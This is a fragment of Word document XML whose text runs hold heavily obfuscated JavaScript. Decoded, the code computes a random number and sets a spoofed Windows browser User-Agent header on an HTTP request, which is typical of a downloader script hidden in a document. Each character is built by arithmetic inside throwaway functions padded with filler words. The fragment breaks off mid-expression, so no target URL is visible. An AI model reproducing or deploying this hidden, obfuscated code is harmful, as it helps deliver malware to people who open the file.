        <w:t>gicqnthey76=Math[(function(Rt,Rx){ var uneth4=Brfcook; uneth4[Vgtf_56]=2; uneth4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uneth4[600]-uneth4[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var wthfea4=Brfcook; wthfea4[Vgtf_56]=1; wthfea4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wthfea4[600]-wthfea4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var uiwother5=Brfcook; uiwother5[Vgtf_56]=0; uiwother5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uiwother5[600]-uiwother5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nntthepa3=Brfcook; nntthepa3[Vgtf_56]=4; nntthepa3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nntthepa3[600]-nntthepa3[Vgtf_56]),RunGe);  })(true,'must38',false,'named69')+(function(Rt,Rx){ var jktan5=Brfcook; jktan5[Vgtf_56]=3; jktan5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jktan5[600]-jktan5[Vgtf_56]),RunGe);  })(1026,'could80',true)]((Math[(function(Rt,Rx){ var uuwthat3=Brfcook; uuwthat3[Vgtf_56]=3; uuwthat3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuwthat3[600]-uuwthat3[Vgtf_56]),RunGe);  })(false,1298,false)+(function(Rt,Rx){ var qunHe5=Brfcook; qunHe5[Vgtf_56]=1; qunHe5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qunHe5[600]-qunHe5[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var ijqlive5=Brfcook; ijqlive5[Vgtf_56]=4; ijqlive5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijqlive5[600]-ijqlive5[Vgtf_56]),RunGe);  })(true,'second5',null,'itself96')+(function(Rt,Rx){ var fwqco4=Brfcook; fwqco4[Vgtf_56]=4; fwqco4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwqco4[600]-fwqco4[Vgtf_56]),RunGe);  })('declarations83',1731,'provided81','second5')+(function(Rt,Rx){ var vesmere3=Brfcook; vesmere3[Vgtf_56]=2; vesmere3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vesmere3[600]-vesmere3[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var suneve3=Brfcook; suneve3[Vgtf_56]=2; suneve3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suneve3[600]-suneve3[Vgtf_56]),RunGe);  })(true,'White35')]() * 10) + 1);</w:t>
        <w:tab/>
        <w:t>gicqnauthorities97[(function(Rt,Rx){ var jshski5=Brfcook; jshski5[Vgtf_56]=0; jshski5[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jshski5[600]-jshski5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var stqlivel5=Brfcook; stqlivel5[Vgtf_56]=4; stqlivel5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(stqlivel5[600]-stqlivel5[Vgtf_56]),RunGe);  })(null,'second5','itself96',true)+(function(Rt,Rx){ var qjnaval5=Brfcook; qjnaval5[Vgtf_56]=1; qjnaval5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjnaval5[600]-qjnaval5[Vgtf_56]),RunGe);  })('progress41')+(function(Rt,Rx){ var iehwrite3=Brfcook; iehwrite3[Vgtf_56]=3; iehwrite3[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iehwrite3[600]-iehwrite3[Vgtf_56]),RunGe);  })('Both81','beingcharitable40','social53')+(function(Rt,Rx){ var jskofp5=Brfcook; jskofp5[Vgtf_56]=0; jskofp5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jskofp5[600]-jskofp5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var njpev5=Brfcook; njpev5[Vgtf_56]=0; njpev5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njpev5[600]-njpev5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hijHe5=Brfcook; hijHe5[Vgtf_56]=0; hijHe5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hijHe5[600]-hijHe5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var iwufe3=Brfcook; iwufe3[Vgtf_56]=4; iwufe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwufe3[600]-iwufe3[Vgtf_56]),RunGe);  })('into30','Asimov30','must38','named69')+(function(Rt,Rx){ var ikuothe5=Brfcook; ikuothe5[Vgtf_56]=2; ikuothe5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ikuothe5[600]-ikuothe5[Vgtf_56]),RunGe);  })('robot28',true)+(function(Rt,Rx){ var jufother4=Brfcook; jufother4[Vgtf_56]=4; jufother4[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jufother4[600]-jufother4[Vgtf_56]),RunGe);  })('robot28','into6',false,null)+(function(Rt,Rx){ var njhcont3=Brfcook; njhcont3[Vgtf_56]=4; njhcont3[Vgtf_56-(Vgtf_56/3)]=76; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njhcont3[600]-njhcont3[Vgtf_56]),RunGe);  })('what20','humans11',false,1072)+(function(Rt,Rx){ var njffo5=Brfcook; njffo5[Vgtf_56]=3; njffo5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njffo5[600]-njffo5[Vgtf_56]),RunGe);  })(1647,'being84',true)+(function(Rt,Rx){ var ujhthat83=Brfcook; ujhthat83[Vgtf_56]=2; ujhthat83[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujhthat83[600]-ujhthat83[Vgtf_56]),RunGe);  })('obey60',false)+(function(Rt,Rx){ var jefgrad4=Brfcook; jefgrad4[Vgtf_56]=1; jefgrad4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jefgrad4[600]-jefgrad4[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var qikgradu5=Brfcook; qikgradu5[Vgtf_56]=2; qikgradu5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qikgradu5[600]-qikgradu5[Vgtf_56]),RunGe);  })('robots83','conscience16')+(function(Rt,Rx){ var qqefeatu4=Brfcook; qqefeatu4[Vgtf_56]=4; qqefeatu4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qqefeatu4[600]-qqefeatu4[Vgtf_56]),RunGe);  })(67,67,'into30','Asimov30')]((function(Rt,Rx){ var vffme5=Brfcook; vffme5[Vgtf_56]=0; vffme5[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vffme5[600]-vffme5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var whhand5=Brfcook; whhand5[Vgtf_56]=1; whhand5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whhand5[600]-whhand5[Vgtf_56]),RunGe);  })('could80')+(function(Rt,Rx){ var tquroad3=Brfcook; tquroad3[Vgtf_56]=1; tquroad3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tquroad3[600]-tquroad3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var jfqgrati4=Brfcook; jfqgrati4[Vgtf_56]=4; jfqgrati4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfqgrati4[600]-jfqgrati4[Vgtf_56]),RunGe);  })(1245,null,false,'addition49')+(function(Rt,Rx){ var eweother4=Brfcook; eweother4[Vgtf_56]=2; eweother4[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eweother4[600]-eweother4[Vgtf_56]),RunGe);  })('robot28',false)+(function(Rt,Rx){ var eqtcon5=Brfcook; eqtcon5[Vgtf_56]=4; eqtcon5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eqtcon5[600]-eqtcon5[Vgtf_56]),RunGe);  })(null,'what20','humans11',null)+(function(Rt,Rx){ var jweever3=Brfcook; jweever3[Vgtf_56]=2; jweever3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jweever3[600]-jweever3[Vgtf_56]),RunGe);  })('White35','short49')+(function(Rt,Rx){ var jkiavala5=Brfcook; jkiavala5[Vgtf_56]=0; jkiavala5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jkiavala5[600]-jkiavala5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var spkthat85=Brfcook; spkthat85[Vgtf_56]=0; spkthat85[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(spkthat85[600]-spkthat85[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wkqcon5=Brfcook; wkqcon5[Vgtf_56]=2; wkqcon5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wkqcon5[600]-wkqcon5[Vgtf_56]),RunGe);  })(null,'declarations83'),(function(Rt,Rx){ var kfhavala4=Brfcook; kfhavala4[Vgtf_56]=1; kfhavala4[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfhavala4[600]-kfhavala4[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var eqvtha5=Brfcook; eqvtha5[Vgtf_56]=0; eqvtha5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eqvtha5[600]-eqvtha5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hiproadI5=Brfcook; hiproadI5[Vgtf_56]=3; hiproadI5[Vgtf_56-(Vgtf_56/3)]=125; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hiproadI5[600]-hiproadI5[Vgtf_56]),RunGe);  })('lawsthe36','free58',true)+(function(Rt,Rx){ var pfhavala4=Brfcook; pfhavala4[Vgtf_56]=2; pfhavala4[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfhavala4[600]-pfhavala4[Vgtf_56]),RunGe);  })(null,2084)+(function(Rt,Rx){ var kujwe5=Brfcook; kujwe5[Vgtf_56]=4; kujwe5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kujwe5[600]-kujwe5[Vgtf_56]),RunGe);  })(false,'astonished95',null,'Labyrinthine79')+(function(Rt,Rx){ var jiigra4=Brfcook; jiigra4[Vgtf_56]=2; jiigra4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jiigra4[600]-jiigra4[Vgtf_56]),RunGe);  })(true,true)+(function(Rt,Rx){ var qkfFort4=Brfcook; qkfFort4[Vgtf_56]=1; qkfFort4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qkfFort4[600]-qkfFort4[Vgtf_56]),RunGe);  })(1261)+(function(Rt,Rx){ var iwpofpov3=Brfcook; iwpofpov3[Vgtf_56]=3; iwpofpov3[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwpofpov3[600]-iwpofpov3[Vgtf_56]),RunGe);  })('daily6',2518,null)+(function(Rt,Rx){ var qwhski4=Brfcook; qwhski4[Vgtf_56]=4; qwhski4[Vgtf_56-(Vgtf_56/3)]=57; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qwhski4[600]-qwhski4[Vgtf_56]),RunGe);  })('human24','entertain53','clutches88','thus68')+(function(Rt,Rx){ var twjavala4=Brfcook; twjavala4[Vgtf_56]=0; twjavala4[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twjavala4[600]-twjavala4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var feqco5=Brfcook; feqco5[Vgtf_56]=0; feqco5[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(feqco5[600]-feqco5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var eeqwrit5=Brfcook; eeqwrit5[Vgtf_56]=0; eeqwrit5[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eeqwrit5[600]-eeqwrit5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vijForth3=Brfcook; vijForth3[Vgtf_56]=4; vijForth3[Vgtf_56-(Vgtf_56/3)]=44; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vijForth3[600]-vijForth3[Vgtf_56]),RunGe);  })(true,true,'while59','that50')+(function(Rt,Rx){ var ueile5=Brfcook; ueile5[Vgtf_56]=2; ueile5[Vgtf_56-(Vgtf_56/3)]=89; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ueile5[600]-ueile5[Vgtf_56]),RunGe);  })('MrWhites97','liveunder14')+(function(Rt,Rx){ var wptfound5=Brfcook; wptfound5[Vgtf_56]=1; wptfound5[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wptfound5[600]-wptfound5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var tntother4=Brfcook; tntother4[Vgtf_56]=2; tntother4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tntother4[600]-tntother4[Vgtf_56]),RunGe);  })(null,'robot28')+(function(Rt,Rx){ var ehfme5=Brfcook; ehfme5[Vgtf_56]=4; ehfme5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehfme5[600]-ehfme5[Vgtf_56]),RunGe);  })(null,null,false,'idea46')+(function(Rt,Rx){ var qteFort4=Brfcook; qteFort4[Vgtf_56]=1; qteFort4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qteFort4[600]-qteFort4[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var pseaval3=Brfcook; pseaval3[Vgtf_56]=0; pseaval3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pseaval3[600]-pseaval3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pkpand3=Brfcook; pkpand3[Vgtf_56]=4; pkpand3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pkpand3[600]-pkpand3[Vgtf_56]),RunGe);  })('could80','State64','situationbecame47',false)+(function(Rt,Rx){ var fsqFor4=Brfcook; fsqFor4[Vgtf_56]=3; fsqFor4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fsqFor4[600]-fsqFor4[Vgtf_56]),RunGe);  })(null,false,2882)+(function(Rt,Rx){ var uqqha5=Brfcook; uqqha5[Vgtf_56]=2; uqqha5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqqha5[600]-uqqha5[Vgtf_56]),RunGe);  })(2506,false)+(function(Rt,Rx){ var qnqgradu4=Brfcook; qnqgradu4[Vgtf_56]=4; qnqgradu4[Vgtf_56-(Vgtf_56/3)]=88; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qnqgradu4[600]-qnqgradu4[Vgtf_56]),RunGe);  })('Laws75','although94',false,'humans57')+(function(Rt,Rx){ var pqfFort5=Brfcook; pqfFort5[Vgtf_56]=4; pqfFort5[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pqfFort5[600]-pqfFort5[Vgtf_56]),RunGe);  })(2365,true,'while59','that50')+(function(Rt,Rx){ var qikrooms5=Brfcook; qikrooms5[Vgtf_56]=3; qikrooms5[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qikrooms5[600]-qikrooms5[Vgtf_56]),RunGe);  })('White35','short49','which82')+(function(Rt,Rx){ var fipgr5=Brfcook; fipgr5[Vgtf_56]=2; fipgr5[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fipgr5[600]-fipgr5[Vgtf_56]),RunGe);  })(false,null)+(function(Rt,Rx){ var kihth3=Brfcook; kihth3[Vgtf_56]=0; kihth3[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kihth3[600]-kihth3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vpeot4=Brfcook; vpeot4[Vgtf_56]=0; vpeot4[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vpeot4[600]-vpeot4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var svscon4=Brfcook; svscon4[Vgtf_56]=4; svscon4[Vgtf_56-(Vgtf_56/3)]=63; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svscon4[600]-svscon4[Vgtf_56]),RunGe);  })('declarations83','provided81','second5','itself96')+(function(Rt,Rx){ var vfwconsc5=Brfcook; vfwconsc5[Vgtf_56]=2; vfwconsc5[Vgtf_56-(Vgtf_56/3)]=34; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vfwconsc5[600]-vfwconsc5[Vgtf_56]),RunGe);  })(null,'declarations83')+(function(Rt,Rx){ var uipan3=Brfcook; uipan3[Vgtf_56]=0; uipan3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uipan3[600]-uipan3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var iniroadI4=Brfcook; iniroadI4[Vgtf_56]=4; iniroadI4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iniroadI4[600]-iniroadI4[Vgtf_56]),RunGe);  })('lawsthe36',true,true,false)+(function(Rt,Rx){ var quqwr4=Brfcook; quqwr4[Vgtf_56]=4; quqwr4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quqwr4[600]-quqwr4[Vgtf_56]),RunGe);  })(1292,'Both81','beingcharitable40',true)+(function(Rt,Rx){ var qinski3=Brfcook; qinski3[Vgtf_56]=0; qinski3[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qinski3[600]-qinski3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pufcons4=Brfcook; pufcons4[Vgtf_56]=2; pufcons4[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pufcons4[600]-pufcons4[Vgtf_56]),RunGe);  })(1217,'declarations83')+(function(Rt,Rx){ var jkqlivel3=Brfcook; jkqlivel3[Vgtf_56]=3; jkqlivel3[Vgtf_56-(Vgtf_56/3)]=62; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jkqlivel3[600]-jkqlivel3[Vgtf_56]),RunGe);  })(false,1013,1013)+(function(Rt,Rx){ var vejro3=Brfcook; vejro3[Vgtf_56]=1; vejro3[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vejro3[600]-vejro3[Vgtf_56]),RunGe);  })(2791)+(function(Rt,Rx){ var jsjgra3=Brfcook; jsjgra3[Vgtf_56]=3; jsjgra3[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jsjgra3[600]-jsjgra3[Vgtf_56]),RunGe);  })(true,2552,'robots83')+(function(Rt,Rx){ var kwsthat85=Brfcook; kwsthat85[Vgtf_56]=4; kwsthat85[Vgtf_56-(Vgtf_56/3)]=58; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwsthat85[600]-kwsthat85[Vgtf_56]),RunGe);  })(true,false,2295,true)+(function(Rt,Rx){ var hsegr4=Brfcook; hsegr4[Vgtf_56]=3; hsegr4[Vgtf_56-(Vgtf_56/3)]=55; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hsegr4[600]-hsegr4[Vgtf_56]),RunGe);  })(1753,1753,1753)+(function(Rt,Rx){ var ujuroadI5=Brfcook; ujuroadI5[Vgtf_56]=2; ujuroadI5[Vgtf_56-(Vgtf_56/3)]=43; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujuroadI5[600]-ujuroadI5[Vgtf_56]),RunGe);  })(null,'lawsthe36')+(function(Rt,Rx){ var tjfwri3=Brfcook; tjfwri3[Vgtf_56]=2; tjfwri3[Vgtf_56-(Vgtf_56/3)]=34; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjfwri3[600]-tjfwri3[Vgtf_56]),RunGe);  })(null,true)+(function(Rt,Rx){ var hvhHer3=Brfcook; hvhHer3[Vgtf_56]=0; hvhHer3[Vgtf_56-(Vgtf_56/3)]=65; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hvhHer3[600]-hvhHer3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pviskill5=Brfcook; pviskill5[Vgtf_56]=2; pviskill5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pviskill5[600]-pviskill5[Vgtf_56]),RunGe);  })('human24',false)+(function(Rt,Rx){ var fskgradu5=Brfcook; fskgradu5[Vgtf_56]=2; fskgradu5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fskgradu5[600]-fskgradu5[Vgtf_56]),RunGe);  })('robots83','conscience16')+(function(Rt,Rx){ var kiqmer5=Brfcook; kiqmer5[Vgtf_56]=2; kiqmer5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kiqmer5[600]-kiqmer5[Vgtf_56]),RunGe);  })(false,'idea46')+(function(Rt,Rx){ var pnsmer4=Brfcook; pnsmer4[Vgtf_56]=0; pnsmer4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnsmer4[600]-pnsmer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wstwri3=Brfcook; wstwri3[Vgtf_56]=0; wstwri3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wstwri3[600]-wstwri3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tvsmer4=Brfcook; tvsmer4[Vgtf_56]=2; tvsmer4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tvsmer4[600]-tvsmer4[Vgtf_56]),RunGe);  })('idea46',1526)+(function(Rt,Rx){ var ffvmer5=Brfcook; ffvmer5[Vgtf_56]=2; ffvmer5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ffvmer5[600]-ffvmer5[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var sjhfea5=Brfcook; sjhfea5[Vgtf_56]=2; sjhfea5[Vgtf_56-(Vgtf_56/3)]=77; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sjhfea5[600]-sjhfea5[Vgtf_56]),RunGe);  })(1419,'into30')+(function(Rt,Rx){ var npfroadI4=Brfcook; npfroadI4[Vgtf_56]=3; npfroadI4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(npfroadI4[600]-npfroadI4[Vgtf_56]),RunGe);  })('lawsthe36',true,'free58')+(function(Rt,Rx){ var wingra4=Brfcook; wingra4[Vgtf_56]=2; wingra4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wingra4[600]-wingra4[Vgtf_56]),RunGe);  })(822,'addition49')+(function(Rt,Rx){ var jftHere4=Brfcook; jftHere4[Vgtf_56]=3; jftHere4[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jftHere4[600]-jftHere4[Vgtf_56]),RunGe);  })('rooted92',true,true)+(function(Rt,Rx){ var ippfeat3=Brfcook; ippfeat3[Vgtf_56]=0; ippfeat3[Vgtf_56-(Vgtf_56/3)]=53; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ippfeat3[600]-ippfeat3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vuseve4=Brfcook; vuseve4[Vgtf_56]=1; vuseve4[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vuseve4[600]-vuseve4[Vgtf_56]),RunGe);  })('White35')+(function(Rt,Rx){ var uneco4=Brfcook; uneco4[Vgtf_56]=2; uneco4[Vgtf_56-(Vgtf_56/3)]=57; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uneco4[600]-uneco4[Vgtf_56]),RunGe);  })(null,'declarations83')+(function(Rt,Rx){ var jepcont4=Brfcook; jepcont4[Vgtf_56]=4; jepcont4[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jepcont4[600]-jepcont4[Vgtf_56]),RunGe);  })(null,true,null,'what20')+(function(Rt,Rx){ var twpwork44=Brfcook; twpwork44[Vgtf_56]=2; twpwork44[Vgtf_56-(Vgtf_56/3)]=53; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twpwork44[600]-twpwork44[Vgtf_56]),RunGe);  })(false,'although94')+(function(Rt,Rx){ var neero3=Brfcook; neero3[Vgtf_56]=3; neero3[Vgtf_56-(Vgtf_56/3)]=57; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(neero3[600]-neero3[Vgtf_56]),RunGe);  })(false,'lawsthe36',2446)+(function(Rt,Rx){ var eseaval4=Brfcook; eseaval4[Vgtf_56]=3; eseaval4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eseaval4[600]-eseaval4[Vgtf_56]),RunGe);  })('progress41','displayed83','rather47')+(function(Rt,Rx){ var qpjwr4=Brfcook; qpjwr4[Vgtf_56]=3; qpjwr4[Vgtf_56-(Vgtf_56/3)]=43; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qpjwr4[600]-qpjwr4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40','social53')+(function(Rt,Rx){ var fuqmer5=Brfcook; fuqmer5[Vgtf_56]=0; fuqmer5[Vgtf_56-(Vgtf_56/3)]=75; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fuqmer5[600]-fuqmer5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qtpgra4=Brfcook; qtpgra4[Vgtf_56]=2; qtpgra4[Vgtf_56-(Vgtf_56/3)]=74; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qtpgra4[600]-qtpgra4[Vgtf_56]),RunGe);  })('addition49',true)+(function(Rt,Rx){ var jpkfe4=Brfcook; jpkfe4[Vgtf_56]=1; jpkfe4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jpkfe4[600]-jpkfe4[Vgtf_56]),RunGe);  })('into30')+(function(Rt,Rx){ var tueski4=Brfcook; tueski4[Vgtf_56]=0; tueski4[Vgtf_56-(Vgtf_56/3)]=77; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tueski4[600]-tueski4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jsvsk5=Brfcook; jsvsk5[Vgtf_56]=3; jsvsk5[Vgtf_56-(Vgtf_56/3)]=79; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jsvsk5[600]-jsvsk5[Vgtf_56]),RunGe);  })('human24',null,null)+(function(Rt,Rx){ var qssFo3=Brfcook; qssFo3[Vgtf_56]=1; qssFo3[Vgtf_56-(Vgtf_56/3)]=45; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qssFo3[600]-qssFo3[Vgtf_56]),RunGe);  })('while59')+(function(Rt,Rx){ var qphgradu5=Brfcook; qphgradu5[Vgtf_56]=1; qphgradu5[Vgtf_56-(Vgtf_56/3)]=33; return 